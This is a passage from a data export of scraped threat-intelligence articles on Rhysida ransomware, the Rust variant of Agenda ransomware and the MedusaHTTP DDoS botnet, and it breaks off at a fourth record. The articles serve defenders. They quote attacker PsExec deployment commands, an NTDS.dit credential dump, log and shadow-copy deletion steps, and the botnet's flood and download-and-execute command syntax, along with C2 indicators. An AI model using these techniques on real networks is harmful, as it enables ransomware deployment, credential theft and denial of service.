  "website_url": "https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/",
  "website_title": "The Rhysida Ransomware: Activity Analysis and Ties to Vice Society - Check Point Research",
  "file_name": null,
  "file_size": null,
  "content": "THE RHYSIDA RANSOMWARE: ACTIVITY ANALYSIS AND TIES TO VICE SOCIETY\nAugust 8, 2023\nIntroduction\nThe Rhysida ransomware group was first revealed in May this year, and since then has been linked to several impactful intrusions, including an attack on the Chilean Army. Recently the group was also tied to an attack against Prospect Medical Holdings, affecting 17 hospitals and 166 clinics across the United States. After this attack, the US Department of Health and Human Services defined Rhysida as a significant threat to the healthcare sector.\nWhile responding to a recent Rhysida ransomware case against an educational institution, the Check Point Incident Response Team (CPIRT), in collaboration with Check Point Research (CPR), observed a set of unique Techniques, Tactics and Tools (TTPs). During our analysis, we identified significant similarities to the TTPs of another ransomware group – Vice Society. Vice Society was one of the most active and aggressive ransomware groups since 2021, mostly targeting the education and healthcare sectors. For example, Vice Society was responsible for the attack against the Los Angeles Unified School District.\nAs a connection between Vice Society and Rhysida was suggested recently, we bring forth technical evidence to strengthen the connection. Our analysis shows both a technical similarity between the two groups, and a clear correlation between the emergence of Rhysida and the disappearance of Vice Society. In addition, the two groups share a focus on two main sectors which stand out in the ransomware ecosystem: education and healthcare.\nAs Vice Society was observed deploying a variety of commodity ransomware payloads, this link does not suggest that Rhysida is exclusively used by Vice Society, but shows with at least medium confidence that Vice Society operators are now using Rhysida ransomware.\nTactics, Techniques and Procedures\nAs the Rhysida ransomware payload was thoroughly analyzed before, we will focus on the TTPs leading to its deployment, specifically on Lateral Movement, Credential Access, Defense Evasion, Command and Control, and Impact.\nBased on the evidence we have, the time to ransom (TTR) of the actors employing Rhysida ransomware is relatively low. It has been eight days from the first signs of lateral movement to the widespread ransomware deployment.\nLateral Movement\nThe attackers used a variety of tools to perform lateral movement, including:\nRemote Desktop Protocol – Throughout the intrusion, the threat actor initiated RDP connections, and took additional steps to deliberately remove associated logs and registry entries to harden detection and analysis efforts (as described in the Defense Evasion section). RDP remains an effective approach to performing lateral movement within the environment.\nRemote PowerShell Sessions (WinRM) – While connected remotely via RDP, the threat actor was observed initiating remote PowerShell connections to servers within the environment. This happened in the days before the ransomware payload was deployed.\nPsExec – The ransomware payload itself was deployed using PsExec from a server within the environment. The deployment happened in two phases.\nCopying the malicious payload using the command PsExec.exe -d \\\\VICTIM_MACHINE -u \"DOMAIN\\ADMIN\" -p \"Password\" -s cmd /c COPY \"\\\\path_to_ransomware\\payload.exe\" \"C:\\windows\\temp\".\nExecuting the malicious payload using the command PsExec.exe -d \\\\VICTIM_MACHINE -u \"DOMAIN\\ADMIN\"\" -p \"Password\" -s cmd /c c:\\windows\\temp\\payload.exe.\nCredential Access\nMost notably, the threat actor used ntdsutil.exe to create a backup of NTDS.dit in a folder name temp_l0gs. This path was utilized by the actor multiple times. In addition to those, the threat actor has enumerated Domain Administrator accounts and attempted to log in using some of them.\nCommand and Control\nThe threat actors have utilized several backdoors and tools for persistence, including:\nSystemBC – In a successful PowerShell session, the attacker executed a SystemBC PowerShell implant (very similar to the implant described here) which maintains persistence by installing a registry run key named socks to execute the script on startup. The implant reaches out to 5.255.103[.]7. Additionally, the threat actor set up a firewall rule named Windows Update to allow outbound traffic to another server, 5.226.141[.]196.\nAnyDesk – The threat actor was observed using the remote management tool AnyDesk.\nDefense Evasion\nThroughout the activity, the threat actors consistently deleted logs and forensic artifacts following their activity. This includes:\nDeleting the history of recently used files and folders.\nDeleting a list of recently executed programs.\nDeleting the history of recently typed paths in File Explorer.\nDeleting PowerShell console history file.\nDeleting all files and folders within the current user’s temporary folder.\nFollowing RDP sessions, the threat actor also deleted RDP-specific logs by:\nSearching for all subkeys under “HKCU:\\Software\\Microsoft\\Terminal Server Client” in the Windows Registry, and for each subkey, removing the “UsernameHint” value if it exists.\nDeleting Default.rdp from the users’ Documents folder.\nImpact\nOn the day of ransomware deployment, the threat actor utilized the access provided by AnyDesk to widely deploy the ransomware payload in the environment using PsExec:\nAccount Access Removal – The threat actor initiated a password change for tens of thousands of accounts in the domain to harden remediation efforts.\nInhibit System Recovery – Before deploying the ransomware payload, the threat actor attempted to deploy a PowerShell script with a wide variety of capabilities, including:\nChanging all local passwords to a predefined password.\nKilling services related to database systems, backup software, and security products.\nDisabling Windows Defender and creating exclusions for it.\nDeleting shadow copies with both wmic.exe and vssadmin.exe.\nChanging the default RDP port to 4000 and creating a firewall rule for it.\nDeleting all Windows event logs and PowerShell history.\nData Encryption – The threat actor ended up deploying the Rhysida ransomware payload using PsExec, as described above.\nThe Vice Society Connection\nThroughout our analysis of Rhysida ransomware TTPs and infrastructure, we found several similarities to another infamous ransomware group: Vice Society, which was observed changing ransomware payloads over time. A possible link between Vice Society and Rhysida has been recently suggested. Here we will present additional evidence supporting this claim.\nTechniques, Tools and Infrastructure\nMany of the techniques described above are highly correlated with previous Vice Society intrusions as described by Microsoft and Intrinsec. Some of them might appear quite generic for Ransomware operators, but were utilized in very specific ways, including specific paths, which are not common:\nUtilization of NTDSUtil the create a backup of NTDS.dit to a folder named temp_l0gs. The same path was reported to be used by Vice Society.\nCreation of a local Firewall rule using New-NetFirewallRule named Windows Update to facilitate traffic relaying using SystemBC, a commodity malware. SystemBC was executed through the registry Run key, stored under the value socks.\nInitiation of a domain-wide password change process before deployment of ransomware payload.\nAnalysis of infrastructure related to a Rhysida incident surfaced a set of PortStarter samples, some of them previously attributed to Vice Society. Although PortStarter is often described as a commodity tool, its usage has been linked almost exclusively to Vice Society in public reports.\nVictimology\nIn addition to technical similarity, there is also a correlation between the emergence of Rhysida and a significant decline in Vice Society activity. Based on information from both Rhysida and Vice Society leak sites, we constructed a timeline displaying extortion announcements of the two groups.\nEver since Rhysida first appeared, Vice Society has only published two victims. It’s likely that those were performed earlier and were only published in June. Vice Society actors stopped posting on their leak site since June 21, 2023.\nFigure 1 – Distribution of Rhysida and Vice Society victims over time.\nIn addition, we also noticed similarities in the targeted sectors affected by the two groups, which are well known for targeting the education and healthcare industries. The high portion of victims in the education industry stands out as unique for both groups in the entire ransomware ecosystem:\nFigure 2 – Distribution of Rhysida victims per industry sector.\nFigure 3 – Distribution of Vice Society victims per industry sector.\nConclusion\nOur analysis of Rhysida ransomware intrusions reveals clear ties between the group and the infamous Vice Society, but it also reveals a grim truth – the TTPs of prolific ransomware actors remain largely unchanged. Major portions of the activity we’ve observed could have been used, and have been used, to deploy any ransomware payload by any ransomware group.\nThis highlights the importance of understanding not just the operation of a ransomware payload, but the entire process leading to its deployment. From the usage of remote management tools such as AnyDesk to the deployment of ransomware through PsExec, threat actors leverage a variety of tools to facilitate such attacks. Closely monitoring the activity of those could help in preventing the next ransomware attack.\nCheck Point Software customers remain protected against Rhysida ransomware.\nCheck Point Threat Emulation and Harmony Endpoint provide comprehensive coverage of attack tactics and file types and is protecting against the type of attacks and threats described in this report.\nGO UP\nBACK TO ALL POSTS\nPOPULAR POSTS\nARTIFICIAL INTELLIGENCE\nCHATGPT\nCHECK POINT RESEARCH PUBLICATIONS\nOPWNAI : Cybercriminals Starting to Use ChatGPT\nARTIFICIAL INTELLIGENCE\nCHATGPT\nCHECK POINT RESEARCH PUBLICATIONS\nOpwnAI: AI That Can Save the Day or HACK it Away\nCHECK POINT RESEARCH PUBLICATIONS\nTHREAT RESEARCH\nBlindEagle Targeting Ecuador With Sharpened Tools\nBLOGS AND PUBLICATIONS\nJanuary 11, 2018\n‘RUBYMINER’ CRYPTOMINER AFFECTS 30% OF WW NETWORKS\nCHECK POINT RESEARCH PUBLICATIONS\nGLOBAL CYBER ATTACK REPORTS\nTHREAT RESEARCH\nFebruary 17, 2020\n“THE TURKISH RAT” EVOLVED ADWIND IN A MASSIVE ONGOING PHISHING CAMPAIGN\nAugust 11, 2017\n“THE NEXT WANNACRY” VULNERABILITY IS HERE\n123\nLet’s get in touch\nSubscribe for cpr blogs, news and more\nSubscribe Now\n© 1994-2023 Check Point Software Technologies LTD. All rights reserved.\nProperty of CheckPoint.com\nPrivacy Policy\n—Please choose an option—\nChina\nIndia\nUnited States\nIndonesia\nBrazil\nPakistan\nNigeria\nBangladesh\nRussia\nJapan\nMexico\nPhilippines\nVietnam\nEthiopia\nEgypt\nGermany\nIran\nTurkey\nDemocratic Republic of the Congo\nThailand\nFrance\nUnited Kingdom\nItaly\nBurma\nSouth Africa\nSouth Korea\nColombia\nSpain\nUkraine\nTanzania\nKenya\nArgentina\nAlgeria\nPoland\nSudan\nUganda\nCanada\nIraq\nMorocco\nPeru\nUzbekistan\nSaudi Arabia\nMalaysia\nVenezuela\nNepal\nAfghanistan\nYemen\nNorth Korea\nGhana\nMozambique\nTaiwan\nAustralia\nIvory Coast\nSyria\nMadagascar\nAngola\nCameroon\nSri Lanka\nRomania\nBurkina Faso\nNiger\nKazakhstan\nNetherlands\nChile\nMalawi\nEcuador\nGuatemala\nMali\nCambodia\nSenegal\nZambia\nZimbabwe\nChad\nSouth Sudan\nBelgium\nCuba\nTunisia\nGuinea\nGreece\nPortugal\nRwanda\nCzech Republic\nSomalia\nHaiti\nBenin\nBurundi\nBolivia\nHungary\nSweden\nBelarus\nDominican Republic\nAzerbaijan\nHonduras\nAustria\nUnited Arab Emirates\nIsrael\nSwitzerland\nTajikistan\nBulgaria\nHong Kong (China)\nSerbia\nPapua New Guinea\nParaguay\nLaos\nJordan\nEl Salvador\nEritrea\nLibya\nTogo\nSierra Leone\nNicaragua\nKyrgyzstan\nDenmark\nFinland\nSlovakia\nSingapore\nTurkmenistan\nNorway\nLebanon\nCosta Rica\nCentral African Republic\nIreland\nGeorgia\nNew Zealand\nRepublic of the Congo\nPalestine\nLiberia\nCroatia\nOman\nBosnia and Herzegovina\nPuerto Rico\nKuwait\nMoldov\nMauritania\nPanama\nUruguay\nArmenia\nLithuania\nAlbania\nMongolia\nJamaica\nNamibia\nLesotho\nQatar\nMacedonia\nSlovenia\nBotswana\nLatvia\nGambia\nKosovo\nGuinea-Bissau\nGabon\nEquatorial Guinea\nTrinidad and Tobago\nEstonia\nMauritius\nSwaziland\nBahrain\nTimor-Leste\nDjibouti\nCyprus\nFiji\nReunion (France)\nGuyana\nComoros\nBhutan\nMontenegro\nMacau (China)\nSolomon Islands\nWestern Sahara\nLuxembourg\nSuriname\nCape Verde\nMalta\nGuadeloupe (France)\nMartinique (France)\nBrunei\nBahamas\nIceland\nMaldives\nBelize\nBarbados\nFrench Polynesia (France)\nVanuatu\nNew Caledonia (France)\nFrench Guiana (France)\nMayotte (France)\nSamoa\nSao Tom and Principe\nSaint Lucia\nGuam (USA)\nCuracao (Netherlands)\nSaint Vincent and the Grenadines\nKiribati\nUnited States Virgin Islands (USA)\nGrenada\nTonga\nAruba (Netherlands)\nFederated States of Micronesia\nJersey (UK)\nSeychelles\nAntigua and Barbuda\nIsle of Man (UK)\nAndorra\nDominica\nBermuda (UK)\nGuernsey (UK)\nGreenland (Denmark)\nMarshall Islands\nAmerican Samoa (USA)\nCayman Islands (UK)\nSaint Kitts and Nevis\nNorthern Mariana Islands (USA)\nFaroe Islands (Denmark)\nSint Maarten (Netherlands)\nSaint Martin (France)\nLiechtenstein\nMonaco\nSan Marino\nTurks and Caicos Islands (UK)\nGibraltar (UK)\nBritish Virgin Islands (UK)\nAland Islands (Finland)\nCaribbean Netherlands (Netherlands)\nPalau\nCook Islands (NZ)\nAnguilla (UK)\nWallis and Futuna (France)\nTuvalu\nNauru\nSaint Barthelemy (France)\nSaint Pierre and Miquelon (France)\nMontserrat (UK)\nSaint Helena, Ascension and Tristan da Cunha (UK)\nSvalbard and Jan Mayen (Norway)\nFalkland Islands (UK)\nNorfolk Island (Australia)\nChristmas Island (Australia)\nNiue (NZ)\nTokelau (NZ)\nVatican City\nCocos (Keeling) Islands (Australia)\nPitcairn Islands (UK)\nThis website uses cookies in order to optimize your user experience as well as for advertising and analytics.  For further information, please read our Privacy Policy and ourCookie Notice.\nDISMISS\nManage Preferences",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-10-09T20:23:42.552Z"
  },
  "added_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "652499200b3306d7e575e88b"
  },
  "name": "AgendaCrypt Rust Ransomware",
  "file_type": null,
  "website_url": "https://www.trendmicro.com/en_us/research/22/l/agenda-ransomware-uses-rust-to-target-more-vital-industries.html",
  "website_title": "Agenda Ransomware Uses Rust to Target More Vital Industries",
  "file_name": null,
  "file_size": null,
  "content": "Business\nsearch\nRansomware\nAgenda Ransomware Uses Rust to Target More Vital Industries\nThis year, various ransomware-as-a-service groups have developed versions of their ransomware in Rust, including Agenda. Agenda's Rust variant has targeted vital industries like its Go counterpart. In this blog, we will discuss how the Rust variant works.\nBy: Nathaniel Morales, Ivan Nicole Chavez, Nathaniel Gregory Ragasa, Don Ovid Ladores, Jeffrey Francis Bonaobra, Monte de Jesus\nDecember 16, 2022\nRead time: 5 min (1239 words)\nSubscribe\nThis year, ransomware-as-a-service (RaaS) groups like BlackCat, Hive, and RansomExx have developed versions of their ransomware in Rust, a cross-platform language that makes it easier to tailor malware to different operating systems like Windows and Linux. In this blog entry, we shed light on Agenda (also known as Qilin), another ransomware group that has started using this language.\nAccording to our observations in the past month, the Agenda ransomware’s activities included posting  numerous companies on its leak site. The threat actors not only claimed that they were able to breach the servers of these companies but also threatened to publish their files. The companies that the ransomware group posts on its leak site are located in different countries and belong mostly in the manufacturing and IT industries, with a combined revenue that surpasses US$550 million.\nRecently, we found a sample of the Agenda ransomware written in Rust language and detected as Ransom.Win32.AGENDA.THIAFBB. Notably, the same ransomware, originally written in Go language, was known for targeting healthcare and education sectors in countries like Thailand and Indonesia. The actors customized previous ransomware binaries for the intended victim through the use of confidential information such as leaked accounts and unique company IDs as the appended file extension. The Rust variant has also been seen using intermittent encryption, one of the emerging tactics that threat actors use today for faster encryption and detection evasion.\nFigure 1. Submission details of the binary in VirusTotal, including the submission date and region it was uploaded.\nFigure 2. Strings viewed on BinText showing Rust modules/functions used by the binary\nBlackbox analysis\nWhen executed, the Rust binary prompts the following error requiring a password to be passed as an argument. This command-line feature is similar to the Agenda ransomware binaries written in Golang.\nFigure 3. Error prompt when the sample was executed\nUpon execution of the sample with “—password” as its parameter in conjunction with a dummy password “AgendaPass,” the ransomware sample runs its malicious routine starting with the termination of various processes and services.\nFigure 4. Termination of applications and services\nSpecific to the sample we analyzed, the ransomware appends the extension \"MmXReVIxLV” to encrypted files. It also displays activity logs on the command prompt, including the file it has encrypted and the elapsed time.\nFigure 5. Examples of encrypted files\nFigure 6. Logs in encrypting files\nThe ransomware will then proceed to drop its ransom note on every directory it encrypts. As observed in its ransom note, the password used to execute the ransomware will also be used as the password for logging in to the support chat site of the ransomware group.\nFigure 7. Agenda ransom note\nAgenda ransomware analysis\nUnlike Agenda’s Golang variant, which accepts 10 arguments, its Rust variant only accepts three arguments:\nArgument Description\n-password {string} Defines the password to enter landing\n-ips {IP address} Allows for providing IP addresses\n-paths {directory} Defines the path that parses directories; if this flag is used and left empty, all directories will be scanned \nTable 1. Arguments used by the Agenda ransomware’s Rust variant\nThe Rust variant also contains hard-coded configuration inside its binaries like the earlier samples compiled in Golang.\nFigure 8. Function inside the binary containing the configuration\nFigure 9. Strings containing the configuration\nIt also added the -n, -p, fast, skip, and step flags on its configurations, which are not present in the Golang variant configuration and only used via command-line argument. Upon further analysis, we have learned that these flags are used for intermittent encryption. This tactic enables the ransomware to encrypt the victim’s files faster by partially encrypting the files depending on the values of the flags. This tactic is becoming more popular among ransomware actors as it lets them encrypt faster and avoid detections that heavily rely on read/write file operations.\nFlags Description\nfast Encrypts the first (N*0x200000h) of the file\nskip (N) – step (Y) Skip encryption for N bytes after encrypting Y bytes of the file\nn: {N} p: {P} Encrypt (N*0x200000h) of the file and skips p bytes (P - percentage of the file size)\nTable 2. Flags used for intermittent encryption\nFigure 10. Flags used for intermittent encryption\nFigure 11. Command-line arguments accepted by the Golang variant of the Agenda ransomware\nWe tried to mimic its encryption behavior using some of the flags present on its configuration. For this simulation, we used a dummy file filled with “A” as its content.\nFor fast mode:\nValue: 1\nFigure 12. Fast flag set to 1\nEncrypted bytes: 1 * 0x200000h, where 1 is the value set in the fast flag\nFigure 13. 0x200000h bytes encrypted\nFor N-P mode:\nFigure 14. flags set to n = 1; p = 1\nTotal size = 88,082,336 bytes\nBytes encrypted = 1 * 0x200000,h where 1 is the value set in the n flag\nBytes skipped = 880,818 bytes (1% of the whole file), where 1 is the value set in the p flag\nFigure 15. 0x200000h of bytes encrypted\nFigure 16. 880,818 bytes (equivalent to 1% of the file) encrypted\nAside from the additional flags used for different encryption modes, the Rust variant has included AppInfo to its roster of services to terminate. It disables User Account Control (UAC), a Windows feature that helps prevent malware from executing with administrative rights, resulting in the inability to run other applications with administrative privileges.\nFigure 17. Function used to stop service using parameter 0x01 equivalent to SERVICE_CONTROL_STOP\nFigure 18. Function used for disabling services using parameter 0x04 equivalent to SERVICE_DISABLED\nFigure 19. Unable to run an application with administrative rights after disabling AppInfo service\nThe Agenda ransomware is also known to deploy customized ransomware for each victim, and we have seen that its Rust variants have an allocated space for adding accounts in their configuration to be used mostly for privilege escalation.\nFigure 20. Allocated accounts in the Rust variant configuration of the Agenda ransomware\nThe file extension to be appended on the encrypted files is hard-coded in its configuration.\nFigure 21. File extension to be appended\nUnlike the previous Golang variant, however, the threat actors did not include the credentials of the victim in the configuration of the Rust variant. This feature of the latter prevents other researchers not only from visiting the ransomware’s chat support site but also accessing the threat actors’ conversations when a sample becomes available externally. It also prevents unsolicited messages from other people besides the victim.\nFigure 22. The Agenda ransomware chat support site\nConclusion\nAn emerging ransomware family, Agenda has recently been targeting critical sectors such as healthcare and education industries. At present, its threat actors appear to be migrating their ransomware code to Rust as recent samples still lack some features seen in the original binaries written in the Golang variant of the ransomware. Rust language is becoming more popular among threat actors as it is more difficult to analyze and has a lower detection rate by antivirus engines.\nThreat actors continue to favor ransomware as their tool of choice for conducting their operations, reiterating the call for enterprises and organizations to rely on a multilayered solution to secure data. Trend Micro Vision One™ provides visibility, correlated detection, and behavior monitoring across multiple layers: email, endpoints, servers, cloud workloads to help enterprises and organizations protect their systems from different threats, including ransomware.\nIndicators of Compromise (IOCs)\nSHA256 Detection\ne90bdaaf5f9ca900133b699f18e4062562148169b29cb4eb37a0577388c22527 Ransom.Win32.AGENDA.THIAFBB\n55e070a86b3ef2488d0e58f945f432aca494bfe65c9c4363d739649225efbbd1 Ransom.Win32.AGENDA.THIAHBB\n37546b811e369547c8bd631fa4399730d3bdaff635e744d83632b74f44f56cf6 Ransom.Win32.AGENDA.THIAHBB\nTags\nEndpoints\n|\nRansomware\n|\nResearch\n|\nArticles, News, Reports\nAuthors\nNathaniel Morales\nThreat Analyst\nIvan Nicole Chavez\nThreat Analyst\nNathaniel Gregory Ragasa\nThreat Analyst\nDon Ovid Ladores\nThreats Analyst\nJeffrey Francis Bonaobra\nThreat Research Engineer\nMonte de Jesus\nThreats Analyst\nCONTACT US SUBSCRIBE\nRelated Articles\nExamining the Activities of the Turla APT Group\nExposing Infection Techniques Across Supply Chains and Codebases\nRevisiting 16shop Phishing Kit, Trend-Interpol Partnership\nSee all articles\nTry our services free for 30 days\nStart your free trial today\nResources\nSupport\nAbout Trend\nSelect a country / region\nUnited States\nexpand_more\nPrivacy | Legal | Accessibility | Site map\nCopyright ©2023 Trend Micro Incorporated. All rights reserved\nThis website uses cookies for website functionality, traffic analytics, personalization, social media functionality and advertising. Our Cookie Notice provides more information and explains how to amend your cookie settings.Learn more\nDo Not Sell My Personal Information Accept Cookies",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-10-10T00:21:52.632Z"
  },
  "added_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "6524a5beaa0ab128d963559e"
  },
  "name": "MedusaHTTP",
  "file_type": null,
  "website_url": "https://www.netscout.com/blog/asert/medusahttp-ddos-slithers-back-spotlight",
  "website_title": "MedusaHTTP DDoS Slithers Back into the Spotlight | NETSCOUT",
  "file_name": null,
  "file_size": null,
  "content": "Skip to main content\nUnder Attack?\nHome ASERT Blog MedusaHTTP DDoS Slithers Back into the Spotlight\nBot\nBotnet\nBotnets\nmalware\nMedusaHTTP\nMedusaIRC\nRussia\nStevenkings\nMedusaHTTP DDoS Slithers Back into the Spotlight\nby\nASERT Team\non\nDECEMBER 18TH, 2017\nExecutive Summary\nMedusaHTTP is a HTTP-based DDoS botnet written in .NET, that surfaced in early 2017. MedusaHTTP is based off of MedusaIRC which leveraged IRC for its command and control communications instead of HTTP. MedusaIRC botnet has been advertised on various underground hacker marketplaces since 2015, while MedusaHTTP started appearing in 2017.\nThe alleged seller of MedusaIRC and MedusaHTTP, Stevenking(s) has advertised this botnet family on hacker marketplaces for many years.\nMedusaHTTP has evolved from an IRC botnet to an HTTP botnet. The HTTP components appear to be reused code from the leaked Diamond Fox DDoS botnet.\nMedusaHTTP was observed being distributed by the Rig Exploit Kit by an independent researcher.\nIntroduction\nMedusaHTTP was discovered after reading an independent researcher’s blog post describing malware distributed by recent Rig exploit kit campaigns. Screenshots of network traffic from one of the malware payloads within the post, caught our attention:\nThe blog post initially identified the payload responsible for this traffic as AZORult; however, the commands in this traffic suggest DDoS functionality. AZORult is classified as an information stealing trojan which has the primary objective of capturing passwords, financial and personal information from the victim’s system. Samples of this family and campaign objectives are not known to contain DDoS functionality, so this could suggest a major update to the AZORult malware. ASERT obtained the sample linked in the blog post from VirusTotal, and after analysis we believe this file is not AZORult but rather a new version of the DDoS bot known as Medusa.  \nEnter Medusa – StevenKings’ DDoS botnet kit since 2015\nThis isn’t the first time ASERT has encountered the Medusa botnet, we  previously analyzed the IRC version of Medusa in 2016. In addition, we found references of Medusa being advertised on underground hacker marketplaces dating back to 2015. Advertisements were posted by a user under the name of StevenKings, a sample image of an advertisement is provided below:\nAs insinuated above, Stevenkings may not be a native English speaker. We believe he or she may be a native Russian speaker based on the origin of their most active forum. In this 2015 advertisement, Stevenkings is selling the IRC version of Medusa for $500 in bitcoin, a cryptocurrency often leveraged in underground marketplaces. Reading further shows descriptions of future commands that will be added to the bot such as, “.httpstrong” which was the string that sparked our attention from the above researcher’s blog post. The advertisement also links to images of the botnet’s throughput, first showing screenshots to prove DDoS rates of 30k requests-per-second:\nAnd then, a screenshot of it generating 3k requests-per-second with only 3 bots.\nHigher requests-per-second per bot allows a botnet controller to use less bots for taking down targets. This would mean the botnet controller could infect less victims while still remaining operationally successful.\nMedusa Now in HTTP\nOur research shows Stevenkings advertising the HTTP version of the Medusa botnet on underground hacker marketplaces in early 2017. The advertisements for this version included images of the HTTP command and control panel which appears to use the code and images from Diamond Fox, another well-known DDoS botnet.\nA view of the MedusaHTTP admin panel.\nA view of the MedusaHTTP attack page.\nA view of the Diamond Fox admin panel for comparison.\nMultiple versions of Diamond Fox botnet have been leaked over the past few years which would make the code reuse feasible for the Medusa malware author. All other portions of the code, except for the HTTP-based command and control communications, remain very similar to the IRC version of the Medusa botnet.  \nCommand and Control Communication\nThe latest version of MedusaHTTP uses a HTTP-based command and control (C2) communication method as opposed the IRC communication of its predecessor. The initial connection uses a POST request with a static user agent of Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0 sent to the C2. In the POST request payload, the victim bot will send introspection information using a xyz form item. The format of the introspection information payload follows this format:\nxyz=08:00:27:??:??:??|<OS Type>|Version\nan example of this would be:\nAfter the check-in command is sent, the C2 will either respond with a HTTP status code 200 as seen below:\nor send back one of the following commands:\n.icmp [host] [threads] [delay] [stoptime]\n.httpseebix [www.website.com] [page.php] [threads] [delay] [stoptime]\n.httpoverload [www.website.com] [page.php] [threads] [delay] [stoptime]\n.httpstrong [www.website.com] [page.php] [threads] [delay] [stoptime]\n.httpactive [www.website.com] [page.php] [threads] [delay] [stoptime]\n.httpssl [www.website.com] [page.php] [threads] [delay] [true/false] [stoptime]\n.proxy [www.website.com] [page.php] [webpagewithproxy] [threads] [delay] [stoptime]\n.httppost [www.website.com] [page.php] [postcontent] [threads] [delay] [stoptime]\n.smartflood [GET] [www.website.com] [page.php] [threads] [delay] [stoptime]\n.smartflood [POST] [www.website.com] [page.php] [postcontent] [threads] [delay] [stoptime]\n.syn [host] [port] [sockets] [threads]\n.udp [host] [port] [sockets] [threads] [packetsize]\n.download [http://website.com/exe.exe] [filename] [true/false]\n.stop-[methodname]\n.stop-all\nAfter which the bot will either wait and check-in again at a later time or act on the specific command received.  \nPurported Capabilities\nStevenkings claims MedusaHTTP is capable of the following:\n.httpssl is made for TLS and SSL websites. Using the TRUE option on httpssl will grab cookies.\n.icmp is a layer 3 flood.\n.httpseebix is custom HTTP GET flood.\n.httpstrong is a fast HTTP flood method.\n.httpactive is a mix of TCP and layer 7.\n.httpoverload can crash certain servers.\n.httpproxy uses proxy servers to execute a DDoS.\n.httppost is a POST flood.\n.httpsmartflood bypasses all cookie protection unless its captcha.\n.syn TCP flood which bypasses OVH.\n.udp is basic UDP flood.\n Observed Command Traffic\nASERT observed and was able to capture DDoS and command traffic from a portion of the purported attack types available to MedusaHTTP.\n.httpseebix\nThis command sends GET requests using 1 of 12 user agents randomly chosen from a predefined list, similar to the below example:\n.httpstrong\nThis command appears to be similar to .httpseebix however this uses only one hardcoded user agent to perform http GET request.\n.httpoverload\nThis command appears to be the same as .httpseebix; Stevenkings claims it has the ability to crash certain servers.\n.httpactive\nThis command is advertised as a mixture of TCP and Layer 7 Flooding that has the ability to take down servers. Below you can see the utilization of multiple GET requests with a TCP packet of “0000000” in between them, illustrating this technique.\n.smartflood (GET)\nThis command is purported to bypass cookie protection by StevenKings. The POST version of this command takes an additional parameter ‘Payload’ which, in this example, is ‘hello=hello’.\nThere is also a GET version of this command which looks similar however does not include the POST data.\n.download\nThis command instructs the bot to download and run executables, which could be a bot update or additional malicious files. The method of downloading the executables is a simple HTTP GET request.\n.stop-all\nThis command instructs the bot to stop all active attacks.  \nConclusion\nMedusaHTTP has evolved from its prior IRC version. Although there is a new command and control communication mechanism, a large amount of functionality overlap remains. Many of the DDoS traffic examples above are exactly the same profile of traffic generated by MedusaIRC and continue to be mitigated in the same way using situationally appropriate firewall ACLs and other countermeasures available in Arbor products including HTTP Authentication, Zombie Detection, and AIF Malware Family Blocking.  \nIndicators\nSamples:\n2919a13b964c8b006f144e3c8cc6563740d3d242f44822c8c44dc0db38137ccb\n85ebf6330039de69dbef1a4860274f21d8b980adb9c3d8385873c5d697c61685\ne514935ab07b29ca1ee9eedaf699de202ada70e29b4fc4618908b8ca8b3f83ef\n290eb4666848172a03c9c5123c004278647e8f5445a7d4e9c29a9ecc58c1b329\n4654f4cbd9e3910f4901493b9774d978060f1c9a9489612b66d66ee61667f60f\nCommand and Control Domains:\nDisability[.]su\nFranchessko[.]top\nIrcnews[.]wang\nKjnsfiosgjnlorgiko[.]ru\nMhforum[.]biz\nMissyiurfound[.]bid\nscam-financial[.]org\nsgsdgsdger[.]ru\ntroyamylove[.]gdn\nwooow1[.]ru\nyouframegood[.]ru\nPOSTED IN\nAnalysis\nBotnets\nDDoS Tools and Services\nInteresting Research\nMalware\nReverse Engineering\nthreat analysis\nUncategorized\nSubscribe\nSign up now to receive the latest notifications and updates from NETSCOUT's ASERT.\n*\nEmail Address:\n*\nCompany Name:\n*\nFirst Name:\n*\nLast Name:\nBy continuing, you are agreeing to the NETSCOUT terms of use and privacy policy.\nSubmit\nGuardians of the Connected World®\nDiscover\nEnterprise Solutions\nCommunication Service Provider Solutions\nProducts\nIndustries\nSupport & Services\nLearn\nResource Library\nLearning Center\nMyNETSCOUT\nEvents\nWebinars\nBlog\nAbout\nCareers\nEnvironmental, Social, and Governance\nFor Investors\nNews & Media\nPartners\nConnect\n1-888-357-7667\nContact Us\n© 2023 NETSCOUT\nTerms & Conditions\nData Privacy and Trust Center\nTransparency in Supply Chains\nPrivacy Policy\nVendor Portal\nDo Not Sell or Share My Personal Information\nCalifornia Privacy Notice\nUK Disclosure\nCookie Preferences",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-10-10T01:15:42.649Z"
  },
  "added_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "6524af08c281edf96bb13665"
  },
  "name": "8Base Ransomware",
  "file_type": null,
  "website_url": "https://socradar.io/dark-web-profile-8base-ransomware/",
  "website_title": "Dark Web Profile: 8Base Ransomware",
  "file_name": null,
  "file_size": null,
